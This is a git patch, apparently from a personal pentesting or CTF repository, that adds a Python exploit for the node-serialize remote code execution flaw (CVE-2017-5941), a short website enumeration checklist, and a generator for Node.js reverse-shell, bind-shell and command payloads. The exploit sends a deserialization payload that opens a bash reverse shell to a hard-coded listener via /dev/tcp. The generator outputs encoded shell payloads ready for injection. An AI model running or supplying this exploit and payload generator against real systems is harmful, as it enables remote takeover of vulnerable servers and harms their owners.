From cbfc4137ba17db994b16691f34c0fab026a27907 Mon Sep 17 00:00:00 2001 From: whx Date: Mon, 11 Oct 2021 00:20:03 +0200 Subject: [PATCH] bump --- 49552.py | 47 +++++++++++++ enumeration/docs/websites.md | 12 ++++ reverse_shells/node_shell.py | 129 +++++++++++++++++++++++++++++++++++ 3 files changed, 188 insertions(+) create mode 100644 49552.py create mode 100644 enumeration/docs/websites.md create mode 100644 reverse_shells/node_shell.py diff --git a/49552.py b/49552.py new file mode 100644 index 0000000..a3a1701 --- /dev/null +++ b/49552.py @@ -0,0 +1,47 @@ +# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2) +# Exploit Author: UndeadLarva +# Software Link: https://www.npmjs.com/package/node-serialize +# Version: 0.0.4 +# CVE: CVE-2017-5941 + +import requests +import re +import base64 +import sys + +url = 'http://10.10.216.3/' # change this + +payload = ("require('http').ServerResponse.prototype.end = (function (end) {" +"return function () {" +"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));" +"console.log('still inside');" +"const { exec } = require('child_process');" +"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this +"}" +"})(require('http').ServerResponse.prototype.end)") + +# rce = "_$$ND_FUNC$$_process.exit(0)" +#code ="_$$ND_FUNC$$_console.log('behind you')" +#code = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}" +#code = "_$$ND_FUNC$$_" + payload + +code = "_$$ND_FUNC$$_console.log(1)()" +#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()" +#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}' +#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this +code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" +string = '{"email": "'+code+'"}' + +print code + +cookie = {'session':base64.b64encode(string)} + +response = requests.post(url+"?email="+code).text +print response + +#try: +# response = requests.get(url, cookies=cookie).text +# print response +#except requests.exceptions.RequestException as e: +# print('Oops!') +# sys.exit(1) diff --git a/enumeration/docs/websites.md b/enumeration/docs/websites.md new file mode 100644 index 0000000..0e70131 --- /dev/null +++ b/enumeration/docs/websites.md @@ -0,0 +1,12 @@ +# Website Enumeration + +* `robots.txt` +* [Favicon](https://wiki.owasp.org/index.php/OWASP_favicon_database), `curl` target and `md5sum` +* `sitemap.xml` +* Headers, `curl ` including `-I` or `-v` parameters +* Check Components of the website, like blog frameworks, shops. +* User Wappalyzer +* Snapshots of the site via waybackmachine +* Check repos of the site +* Check buckets +* Fuzz diff --git a/reverse_shells/node_shell.py b/reverse_shells/node_shell.py new file mode 100644 index 0000000..8309a38 --- /dev/null +++ b/reverse_shells/node_shell.py @@ -0,0 +1,129 @@ +#!/usr/bin/python +# Author: Hd7exploit +# hd7exploit.wordpress.com +# Based on https://github.com/evilpacket/node-shells/blob/master/node_revshell.js +import getopt, sys + +def usage(): + print ''' +Usage: %s + +Help: + -c : Run some linux commands (ls,cat...) + -r : Get payload reverse shell + -b : Get payload bind shell + -h : IP address in case of reverse shell + -p : Port + -e : Encode shell + -o : Create a object contain payload with Immediately invoked function expression (IIFE) + ''' % (sys.argv[0]) + +try: + opts, args = getopt.getopt(sys.argv[1:], "c:h:rbp:eo", ["help"]) + if not opts: + usage() + sys.exit() +except getopt.GetoptError: + usage() + sys.exit(2) + +type = host = port = command = "" +encode = False +object = False +for o, a in opts: + if o == "-r": + type = 'REVERSE' + if o == "-b": + type = 'BIND' + if o == "-h": + host = a + if o == "-o": + object = True + if o == "-p": + port = a + if o == "-c": + type = 'COMMAND' + command = a + if o == "-e": + encode = True + if o == "--help": + usage() + sys.exit() + +def get_reverse_shell(): + return ''' + var net = require('net'); + var spawn = require('child_process').spawn; + HOST="%s"; + PORT="%s"; + TIMEOUT="5000"; + if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; } + function c(HOST,PORT) { + var client = new net.Socket(); + client.connect(PORT, HOST, function() { + var sh = spawn('/bin/sh',[]); + client.write("Connected!\\n"); + client.pipe(sh.stdin); + sh.stdout.pipe(client); + sh.stderr.pipe(client); + sh.on('exit',function(code,signal){ + client.end("Disconnected!\\n"); + }); + }); + client.on('error', function(e) { + setTimeout(c(HOST,PORT), TIMEOUT); + }); + } + c(HOST,PORT); + ''' % (host, port) + +def get_bind_shell(): + return ''' + var net = require('net'); + var spawn = require('child_process').spawn; + PORT="%s"; + if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; } + var server = net.createServer(function (c) { + var sh = spawn('/bin/sh', ['-i']); + c.pipe(sh.stdin); + sh.stdout.pipe(c); + sh.stderr.pipe(c); + }); + server.listen(PORT); + ''' % (port) + + +def get_command(command): + return ''' + require('child_process').exec('%s', function(error, stdout, stderr) { + console.log(error) + console.log(stdout) + }) + ''' % (command) + +def encode_string(string): + string_encoded = '' + for char in string: + string_encoded += "," + str(ord(char)) + return string_encoded[1:] + +payload = "" +if type == 'BIND': + payload = get_bind_shell() +elif type == 'REVERSE': + payload = get_reverse_shell() +else: + payload = get_command(command); + +if encode: + payload = encode_string(payload) + +if object: + payload = ''' + {"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"} + ''' % (payload) + +print ''' + =======> Happy hacking <====== +''' +print payload